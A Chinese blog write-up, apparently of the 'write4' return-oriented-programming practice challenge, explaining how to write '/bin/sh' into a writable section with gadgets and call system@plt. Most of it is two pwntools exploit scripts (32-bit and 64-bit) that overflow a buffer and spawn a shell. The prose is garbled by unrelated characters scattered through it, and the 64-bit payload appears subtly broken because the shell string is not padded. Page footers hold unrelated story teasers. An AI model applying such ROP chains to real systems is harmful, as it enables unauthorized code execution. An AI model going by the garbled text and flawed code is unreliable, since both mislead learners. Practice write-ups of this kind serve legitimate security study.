4_write4

1.觀察有沒有system沒有/bin/sh ,我們可以嘗試想bss或者date段寫入/bin/sh.句占,使用plt表的system
2.mov [edi], ebp-MOV 內(nèi)存單元 寄存器
寄存器ESI忍疾、EDI分唾、SIDI稱為變址寄存器(Index Register)离福,它們主要用于存放存儲單元在段內(nèi)的偏移量爬骤,用它們可實現(xiàn)多種存儲器操作數(shù)的尋址方式醋奠,為以不同的地址形式訪問存儲單元提供方便幢竹。

思考:為什么有一個system函數(shù)耳峦,不講/bin/sh傳入data段里面,然后調(diào)用這個函數(shù)完成調(diào)用焕毫?
32
# -*- coding:UTF-8 -*-
from pwn import*
##context.log_level = 'debug'
p  = process("./write432")
##p = remote("","")

date_addr = 0x804A028
system_elf_addr = 0x8048430
move_edi_ebp_addr = 0x8048670
pop_edi_ebp_addr = 0x80486da

payload = 'A'*0x2c
payload += p32(pop_edi_ebp_addr) + p32(date_addr) + "/bin" + p32(move_edi_ebp_addr)
payload += p32(pop_edi_ebp_addr) + p32(date_addr+4) + "/sh\x00" + p32(move_edi_ebp_addr)
payload += p32(system_elf_addr) + p32(0) + p32(date_addr)

p.sendline(payload)
p.interactive()




首先我們是發(fā)現(xiàn)了 溢出的漏洞  我們沒有可以利用sysytem入口  也沒有/bin/sh的字符串蹲坷。  
 只有system_plt的地址  我們需要傳入/bin/sh讓我們利用,  
 將利用godget片段 傳入edi>然后跳轉(zhuǎn)到edi利用邑飒,
我們需要一個介質(zhì)來裝載/bin/sh  就是我們的date_addr

#p32(0)  是用來覆蓋rbp的地址  (自己有疑惑)


這道題填入和調(diào)用沒什么大問題循签,最關(guān)鍵的要記住,64位的數(shù)據(jù)不是直接傳入棧里面的疙咸,我們需要一個pop來將我們的system和/bin/sh的地址接收县匠。

64

from pwn import*
##context.log_level = 'debug'
p  = process("./write4")
##p = remote("","")
date_addr = 0x601050
system_plt_addr = 0x4005e0
pop_r14_r15_addr = 0x400890
mov_r14_r15_addr = 0x400820
pop_edi_addr = 0x400893

payload = 'A' * 0x20 + p64(0)
payload += p64(pop_r14_r15_addr)
payload += p64(date_addr)
payload += "/bin/sh"
payload += p64(mov_r14_r15_addr)
payload += p64(pop_edi_addr)
payload += p64(date_addr)
payload += p64(system_plt_addr)

p.sendline(payload)
p.interactive()
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市撒轮,隨后出現(xiàn)的幾起案子乞旦,更是在濱河造成了極大的恐慌,老刑警劉巖腔召,帶你破解...
    沈念sama閱讀 217,277評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件杆查,死亡現(xiàn)場離奇詭異,居然都是意外死亡臀蛛,警方通過查閱死者的電腦和手機亲桦,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,689評論 3 393
  • 文/潘曉璐 我一進店門崖蜜,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人客峭,你說我怎么就攤上這事豫领。” “怎么了舔琅?”我有些...
    開封第一講書人閱讀 163,624評論 0 353
  • 文/不壞的土叔 我叫張陵等恐,是天一觀的道長。 經(jīng)常有香客問我备蚓,道長课蔬,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,356評論 1 293
  • 正文 為了忘掉前任郊尝,我火速辦了婚禮二跋,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘流昏。我一直安慰自己扎即,他們只是感情好,可當我...
    茶點故事閱讀 67,402評論 6 392
  • 文/花漫 我一把揭開白布况凉。 她就那樣靜靜地躺著谚鄙,像睡著了一般。 火紅的嫁衣襯著肌膚如雪刁绒。 梳的紋絲不亂的頭發(fā)上闷营,一...
    開封第一講書人閱讀 51,292評論 1 301
  • 那天,我揣著相機與錄音知市,去河邊找鬼粮坞。 笑死,一個胖子當著我的面吹牛初狰,可吹牛的內(nèi)容都是我干的莫杈。 我是一名探鬼主播,決...
    沈念sama閱讀 40,135評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼奢入,長吁一口氣:“原來是場噩夢啊……” “哼筝闹!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起腥光,我...
    開封第一講書人閱讀 38,992評論 0 275
  • 序言:老撾萬榮一對情侶失蹤关顷,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后武福,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體议双,經(jīng)...
    沈念sama閱讀 45,429評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,636評論 3 334
  • 正文 我和宋清朗相戀三年捉片,在試婚紗的時候發(fā)現(xiàn)自己被綠了平痰。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片汞舱。...
    茶點故事閱讀 39,785評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖宗雇,靈堂內(nèi)的尸體忽然破棺而出昂芜,到底是詐尸還是另有隱情,我是刑警寧澤赔蒲,帶...
    沈念sama閱讀 35,492評論 5 345
  • 正文 年R本政府宣布泌神,位于F島的核電站,受9級特大地震影響舞虱,放射性物質(zhì)發(fā)生泄漏欢际。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,092評論 3 328
  • 文/蒙蒙 一矾兜、第九天 我趴在偏房一處隱蔽的房頂上張望幼苛。 院中可真熱鬧,春花似錦焕刮、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,723評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至高镐,卻和暖如春溉旋,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背嫉髓。 一陣腳步聲響...
    開封第一講書人閱讀 32,858評論 1 269
  • 我被黑心中介騙來泰國打工观腊, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人算行。 一個月前我還...
    沈念sama閱讀 47,891評論 2 370
  • 正文 我出身青樓梧油,卻偏偏與公主長得像,于是被迫代替她去往敵國和親州邢。 傳聞我的和親對象是個殘疾皇子儡陨,可洞房花燭夜當晚...
    茶點故事閱讀 44,713評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 愛情總是想象比現(xiàn)實美麗,相逢如是量淌,告別亦如是骗村。我們以為愛得很深、很深...來日歲月呀枢,會讓你知道胚股,它不過很淺、很淺....
    米夏說閱讀 247評論 0 0
  • 經(jīng)過上期我們對沙僧有了多方面的探索缨伊,本期小梁又要帶給我們一個全新的觀點,保證你做夢都想不到财忽。 唐僧倘核,相...
    偽文藝的俏小生閱讀 194評論 0 0